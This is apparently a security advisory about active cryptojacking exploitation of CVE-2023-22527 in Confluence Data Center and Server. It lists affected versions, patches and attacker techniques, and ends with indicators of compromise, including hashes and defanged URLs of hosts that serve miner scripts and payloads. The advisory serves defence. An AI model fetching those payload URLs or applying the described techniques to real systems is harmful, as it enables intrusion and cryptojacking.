The critical template injection vulnerability in the Atlassian Confluence Data Center and Confluence Server is being actively exploited for cryptojacking campaigns that allow remote attackers to execute arbitrary code on vulnerable Confluence installs.
The flaw tracked as CVE-2023-22527 with a CVSS score of 10, affects Confluence Data Center and Server versions 8.0.x, 8.1.x, 8.2.x, 8.3.x, 8.4.x, and 8.5.0 through 8.5.3. Most recent supported versions of Confluence Data Center and Server are not affected by this issue. Atlassian addressed the vulnerability in January 2024 with the release of versions 8.5.4 (LTS), 8.6.0 (Data Center only), and 8.7.1 (Data Center only).
Now, researchers from Trend Micro observed this vulnerability being actively exploited for crypto mining activities, with the attacks involve threat actors that employ methods such as the deployment of shell scripts and XMRig miners, targeting of SSH endpoints, killing competing crypto mining processes, and maintaining persistence via cron jobs.
At least three different threat actors are exploiting the flaw in crypto mining campaigns using XMRig miners and SSH and use cron jobs to remain persistent across the campaign
With this mass exploitation by threat actors, CVE-2023-22527, there exists a significant security risk to organizations worldwide. To minimize the risks and threats associated with this vulnerability, administrators should update their versions of Confluence Data Center and Confluence Server to the latest available versions as soon as possible.
Indicators of Compromise
- 5283CB0CC6F35423C9E41E1C3779B3F3
- B3BFC68DE683391E674ADA5CE72B584B
- A53A9CA8A074C7108F8412C3F8C1FC5D
- 2833C82055BF2D29C65CD9CF6684449A
- 2E32D010E8C85A608022B317E5CB1FA7
hxxp[:]//45[.]144[.]3[.]216:10000/rnv2ymcl - hxxp[:]//45[.]144[.]3[.]216:10000/starrail/config/v2.json
- hxxp[:]//45[.]144[.]3[.]216:10000/starrail/cbt2zip/setup.exe
- hxxp[:]//45[.]144[.]3[.]216:10000/solr.sh
- hxxp[:]//175[.]118[.]126[.]65:8002/js/l.txt
- hxxp[:]//95[.]85[.]93[.]196:80/h4
